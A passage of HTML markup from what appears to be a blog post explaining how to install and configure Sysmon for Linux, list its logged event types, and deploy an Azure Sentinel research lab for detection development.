data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="none">Sysmon for Linux requires the following&nbsp;packages&nbsp;during installation:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="none">sysinternalsebpf (.DEB or .RPM)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><SPAN data-contrast="none">sysmonforlinux&nbsp;(.DEB or .RPM)</SPAN></LI> </UL> <P><SPAN data-contrast="none">For example, for Ubuntu you can run the following (More examples in the INSTALL documents above):</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">wget -q https://packages.microsoft.com/config/ubuntu/$(lsb_release -rs)/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Install Packages</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="none">Depending on&nbsp;the Linux distribution and package manager, you can&nbsp;use&nbsp;the&nbsp;</SPAN><STRONG><SPAN data-contrast="none">apt</SPAN></STRONG><SPAN data-contrast="none">&nbsp;dependency resolver&nbsp;(Debian based distros) or the&nbsp;</SPAN><STRONG><SPAN data-contrast="none">RPM</SPAN></STRONG><SPAN data-contrast="none">&nbsp;package manager&nbsp;(Fedora&nbsp;based distros).</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Following the Ubuntu example, you can run the following commands to install&nbsp;<STRONG>sysinternalsEBPF</STRONG> and&nbsp;<STRONG>Sysmon</STRONG> in that order</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">sudo apt-get update sudo apt-get install sysinternalsebpf sudo apt-get install sysmonforlinux</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Next, you should be able to run the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">sysmon</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;command:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sysmon –h </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_1-1634229152079.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317396i2E7AC23824EF1A63/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_1-1634229152079.png" alt="Cyb3rWard0g_1-1634229152079.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Run Sysmon as a Service</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="none">Finally, we can use the&nbsp;</SPAN><STRONG><SPAN data-contrast="none">sysmon</SPAN></STRONG><SPAN data-contrast="none">&nbsp;binary to install and run&nbsp;Sysmon as a service&nbsp;with a specific Sysmon config (like&nbsp;how one installs&nbsp;Sysmon for Windows).</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo sysmon -accepteula -i sysmonconfig.xml</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_2-1634229152004.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317394i061BB3F893656A63/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_2-1634229152004.png" alt="Cyb3rWard0g_2-1634229152004.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none"><FONT size="5">Explore Syslog Events</FONT>&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">You can explore Sysmon events from the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Syslog</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;log. Later in this post, I will show you how to use other tools to show Sysmon events in a more&nbsp;user-friendly&nbsp;view&nbsp;</SPAN><SPAN data-contrast="auto">;)</img></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">tail –f /var/log/Syslog</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_3-1634229152008.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317398iDC9CCAE0C94B30DA/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_3-1634229152008.png" alt="Cyb3rWard0g_3-1634229152008.png" /></span></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">The Sysmon for Linux Configuration</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="auto">At the time of writing, the&nbsp;Sysmon schema version is&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">4.81,&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">check here for latest version</SPAN><STRONG><SPAN data-contrast="auto">.</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;An&nbsp;example of a&nbsp;config to&nbsp;collect all&nbsp;events&nbsp;can be found in the&nbsp;following link&nbsp;(Not recommended to use in a production environment due to the large&nbsp;number&nbsp;of events generated):</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">SysmonForLinux-CollectAll-Config.xml (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Use the following command to update the Sysmon config:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo sysmon –c newconfig.xml</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Configuration Options</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <TABLE data-tablestyle="MsoTable15Grid1LightAccent1" data-tablelook="1696" aria-rowcount="2"> <TBODY> <TR aria-rowindex="1"> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Option</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Description</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Sample</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="2"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">FieldSizes</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">specify how long you want fields to be so you can avoid the Syslog overrun/broken XML problem</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">&lt;FieldSizes&gt;CommandLine:50,Image:50&lt;/FieldSizes&gt;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> </TBODY> </TABLE> <P aria-level="2"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Available&nbsp;Events</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <TABLE data-tablestyle="MsoTable15Grid1LightAccent1" data-tablelook="1696" aria-rowcount="8"> <TBODY> <TR aria-rowindex="1"> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Event ID</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Description</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="2"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">1</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a new process is&nbsp;created.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="3"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">3</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs TCP/UDP connections on the machine</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR> <TD> <P><STRONG><SPAN data-contrast="auto">4</SPAN></STRONG></P> </TD> <TD> <P class="heading-anchor"><SPAN style="font-family: inherit; background-color: transparent;">Logs&nbsp;</SPAN><SPAN style="font-family: inherit; font-size: 16px; background-color: transparent;">the state of the Sysmon service (started or stopped).</SPAN></P> </TD> </TR> <TR aria-rowindex="4"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">5</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a process terminates.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="5"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">9</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a process conducts reading operations, from the drive.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="6"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">11</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a file is created or overwritten.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="7"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">16</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when the local&nbsp;Sysmon configuration is updated.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="8"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">23</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a file is deleted by a process.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> </TBODY> </TABLE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">All the events in Sysmon for Linux are already documented as data dictionaries in the open-source project OSSEM. You can access that information in the following link:</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN>https://github.com/OTRF/OSSEM-DD/tree/main/linux/sysmon</SPAN><SPAN>&nbsp;<BR /></SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">The MSTIC Sysmon for Linux Configuration</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">The MSTIC R&amp;D team is sharing a few configuration files as part of the release of this&nbsp;project and will be maintaining&nbsp;them&nbsp;as we use&nbsp;them&nbsp;for research and development of detections.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="none"><A href="#" target="_blank">MSTIC-Sysmon/linux/configs at main · microsoft/MSTIC-Sysmon (github.com)</A><BR /><BR /></SPAN></P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">How do we automate the&nbsp;installation process?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">The installation of Sysmon for Linux can be automated with the following bash script</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Sysmon-For-Linux.sh</SPAN></A><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="1"><FONT size="5"><SPAN data-contrast="none">What&nbsp;about a full lab environment?&nbsp;Enter Azure Sentinel To-go!&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="none">Azure Sentinel2Go is an open-source project developed to expedite the deployment of an Azure Sentinel lab along with other Azure resources&nbsp;to expedite&nbsp;research&nbsp;and the development of detections.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">https://github.com/OTRF/Azure-Sentinel2Go</A></SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Azure Sentinel + Sysmon for Linux&nbsp;Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">We have updated our previous&nbsp;Linux environment&nbsp;and we can now&nbsp;deploy everything needed for a small research lab with Sysmon for Linux&nbsp;configured and&nbsp;an Azure monitor agent&nbsp;sending logs to Azure Sentinel:</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">We were able to use&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Resource Manager (ARM)</SPAN></A><SPAN data-contrast="none">&nbsp;templates and a bash script to automate the whole setup. These are all the resources used for each component of the&nbsp;research&nbsp;lab:&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><SPAN data-contrast="none">Azure Sentinel&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel instance</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog data connector</SPAN></A></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog data collection from specific facilities</SPAN></A></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ASIM Sysmon for Linux Parser</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="none">Linux Virtual Machines</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Linux virtual machines</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="none">Ubuntu 18.04.6 LTS (Kernel release: 5.4.0-1059-azure)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="auto">Centos 8.2.2004 (Kernel release: 4.18.0-193.28.1.el8_2.x86_64</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="auto">Red Hat 8.2&nbsp;(Kernel release: 4.18.0-193.65.2.el8_2.x86_64)</SPAN></LI> </UL> </LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Log Analytics Agent&nbsp;for Linux</SPAN></A></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysmon for Linux Installer</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Deploying the Lab Environment&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="11" data-aria-level="1"><SPAN data-contrast="none">Go to:&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Linux/demos/Sysmon-For-Linux</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="12" data-aria-level="1"><SPAN data-contrast="none">Click on the “</SPAN><I><SPAN data-contrast="none">Deploy to Azure</SPAN></I><SPAN data-contrast="none">” Button</SPAN></LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_4-1634229152010.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317397i75133BDDC2CAC385/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_4-1634229152010.png" alt="Cyb3rWard0g_4-1634229152010.png" /></span></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Fill out the following parameters:</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Subscription (selected by default)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Resource group</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Region (selected by default)&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Admin Username</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Admin Password</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Remote Access Mode (</SPAN><I><SPAN data-contrast="none">AllowPublicIP</SPAN></I><SPAN data-contrast="none">&nbsp;selected by default. You can also use Azure Bastion Host. You would just need to set the&nbsp;</SPAN><I><SPAN data-contrast="none">Allowed IP Addresses</SPAN></I><SPAN data-contrast="none">&nbsp;parameter to *)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Allowed IP Addresses (If you use the default access mode&nbsp;</SPAN><I><SPAN data-contrast="none">AllowPublicIP</SPAN></I><SPAN data-contrast="none">, use your home or office public IP address to only allow access from secure places.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="14" data-aria-level="1"><SPAN data-contrast="none">Click the Review &gt; Create buttons to start the deployment</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="15" data-aria-level="1"><SPAN data-contrast="none">You can go to your resource group and explore all the resources being deployed</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_5-1634229152012.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317399i6829CCDD6ED9B0E7/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_5-1634229152012.png" alt="Cyb3rWard0g_5-1634229152012.png" /></span></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="16" data-aria-level="1"><SPAN data-contrast="none">Wait around 5-10 minutes! You should be good to go!</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_6-1634229152015.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317400i1D75B919086B26FF/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_6-1634229152015.png" alt="Cyb3rWard0g_6-1634229152015.png" /></span></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="15" aria-setsize="-1" data-aria-posinset="17" data-aria-level="1"><SPAN data-contrast="auto">You can go to the resource group and see all the resources&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="none">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_7-1634229152019.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317401i87ABC8A50825354E/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_7-1634229152019.png" alt="Cyb3rWard0g_7-1634229152019.png" /></span></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Validate Deployment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">It is very important to validate if everything was deployed properly before exploring events from Sysmon.</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Sysmon running as a service</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">SSH to all your VMs and run the following commands</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">systemctl status sysmon</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_8-1634229152099.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317402i7A22A0606A1F473C/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_8-1634229152099.png" alt="Cyb3rWard0g_8-1634229152099.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none"><FONT size="5">Explore Syslog&nbsp;Events</FONT>&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">You can explore Sysmon events from the&nbsp;</SPAN><STRONG><SPAN 